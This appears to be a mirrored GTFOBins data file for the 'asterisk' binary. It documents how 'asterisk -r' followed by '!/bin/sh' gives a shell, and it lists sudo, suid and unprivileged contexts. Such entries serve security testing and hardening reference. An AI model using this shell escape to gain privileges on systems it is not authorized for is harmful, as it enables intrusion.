1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-08 06:56:15 +01:00
GTFOBins.github.io/_gtfobins/asterisk
2026-01-21 17:27:04 +01:00

15 lines
333 B
Plaintext

---
functions:
shell:
- code: |-
asterisk -r
!/bin/sh
comment: |-
A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.
contexts:
sudo:
suid:
shell: true
unprivileged:
...